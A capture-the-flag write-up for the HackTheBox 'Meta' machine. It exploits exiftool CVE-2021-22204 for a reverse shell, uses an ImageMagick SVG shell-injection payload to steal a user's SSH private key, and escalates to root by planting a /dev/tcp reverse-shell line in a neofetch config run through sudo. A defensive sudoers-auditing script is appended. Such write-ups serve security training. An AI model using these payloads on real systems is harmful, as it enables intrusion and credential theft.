Writeup - Meta (HTB)
5 min read


This is a writeup for the Meta machine from the HackTheBox site.


First, let's start with a scan of our target with the following command:

nmap -sV -T4 -Pn

Two TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 7.9p1)
  • 80/tcp : HTTP web server (Apache httpd)


I start by listing the different pages of the site.

Nothing in particular, so I continue by enumerating subdomains.

Ok, there is a subdomain: I add it to the /etc/hosts file, then access it via a browser.


It is a page that redirects us to another page that contains a form to upload a file.


So I try to upload an image to see what the page tells me:

The result reminds me strongly of a crypto tool I already used: exiftool.

So I now know that this tool is used on the server side, which is good information! So I look for exploits affecting this service. I quickly find this flaw: CVE-2021-22204. It is a vulnerability that allows command execution through the metadata of an image, so we can create a reverse shell! With a little more research I find this GitHub repository.

It is a tool for image modification and reverse shell insertion.

└─$ python3
    1 image files updated

Once the image is modified, I upload it and it creates the reverse shell:

I look for the location of the flag with the following command:

find / -name user.txt 2>/dev/null

I find that the flag is in the home directory of the user thomas, but I don't have the rights to read it...

So I look for a way to switch user. In the site folder I find a folder named convert_images. It looks like an input folder for a script or a service that converts images. I look for other elements with the same name on the system:

$ find / -name "convert_image*" 2>/dev/null

There is a script with the same name! Looking at its content, I can see that it uses the mogrify utility to convert the images in the folder.

cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify

I look for the version of the service with the following command:

Then I look for exploits. After some research I find this exploit, which allows shell injection through an SVG image.

So I use the template provided in the article, then modify it to get the content of the id_rsa file of the user thomas.

<image authenticate='ff" `echo $(cat /home/thomas/.ssh/id_rsa)> /dev/shm/id`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="" xmlns:xlink="">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

Then I copy the file to the convert_images folder. After a few seconds I find the newly created file in /dev/shm.

Now that I have this key, I set its permissions and open an SSH session:

I now have a shell as thomas and I get the first flag.

Privilege escalation

I start by checking the sudo permissions of my user. I notice 2 things:

  • I have the right to use the command /usr/bin/neofetch \"\" as root
  • The environment variable XDG_CONFIG_HOME is kept when running sudo

After some research, I find that neofetch reads a configuration file from the folder ~/.config/neofetch/. So I start by putting a reverse shell in this config file.

$ cd ~/.config/neofetch/
$ echo "/bin/sh -i >& /dev/tcp/ 0>&1" > config.conf

Then I point the variable XDG_CONFIG_HOME at my user's .config directory and run neofetch through sudo.

$ export XDG_CONFIG_HOME="$HOME/.config"
$ sudo -u root /usr/bin/neofetch \"\"

I now have a root reverse shell and can get the last flag.


To patch this host, I think the following actions would be necessary:

  • Update exiftool to avoid CVE-2021-22204
  • Update mogrify to avoid the shell injection exploit
  • Disable the option that keeps the XDG_CONFIG_HOME variable when running sudo
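As a defender's check for that last item, here is an added example that is not part of the original writeup: a small Python audit that flags env_keep entries in a sudoers file and pairs each kept variable with the rules it affects, run over constructed samples that mirror the neofetch rule and XDG_CONFIG_HOME. It assumes the sudoers text is read from a path you choose, and it only parses Defaults env_keep/env_reset lines and simple one-line user specs.

```python
import re

# Constructed sudoers samples (not copied from the box): the weak one keeps
# XDG_CONFIG_HOME across sudo, the hardened one relies on env_reset alone.
WEAK_SUDOERS = """\
Defaults        env_reset
Defaults        env_keep += "XDG_CONFIG_HOME"
root    ALL=(ALL:ALL) ALL
thomas  ALL=(root) NOPASSWD: /usr/bin/neofetch \\"\\"
"""
HARDENED_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
thomas  ALL=(root) NOPASSWD: /usr/bin/neofetch \\"\\"
"""

# Defaults env_keep += "VAR1 VAR2"   and   Defaults !env_reset
ENV_KEEP_RE = re.compile(r'^\s*Defaults\b[^#]*?\benv_keep\s*\+?=\s*"?([^"#\n]+)"?', re.M)
ENV_RESET_OFF_RE = re.compile(r'^\s*Defaults\b[^#]*!env_reset', re.M)
# user  host=(runas) [NOPASSWD:] commands
USER_SPEC_RE = re.compile(r'^\s*(\S+)\s+\S+=\(([^)]*)\)\s*(?:NOPASSWD:\s*)?(.*?)\s*$', re.M)


def audit_sudoers(text):
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    if ENV_RESET_OFF_RE.search(text):
        findings.append("env_reset is disabled: the caller's whole environment reaches every sudo command")
    kept = [v for m in ENV_KEEP_RE.finditer(text) for v in m.group(1).split()]
    for var in kept:
        findings.append(f"env_keep preserves {var}: the calling user controls it inside privileged commands")
    # Every kept variable is caller-controlled input to each non-root rule.
    for user, runas, cmds in USER_SPEC_RE.findall(text):
        if user == "root" or not kept:
            continue
        findings.append(f"{user} may run '{cmds}' as {runas} with caller-controlled {', '.join(kept)}")
    return findings


def audit_file(path):
    """Audit a sudoers file on disk (path is the caller's choice)."""
    with open(path) as fh:
        return audit_sudoers(fh.read())


if __name__ == "__main__":
    for label, sample in (("weak", WEAK_SUDOERS), ("hardened", HARDENED_SUDOERS)):
        print(f"[{label}]")
        for finding in audit_sudoers(sample) or ["no findings"]:
            print("  -", finding)
```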
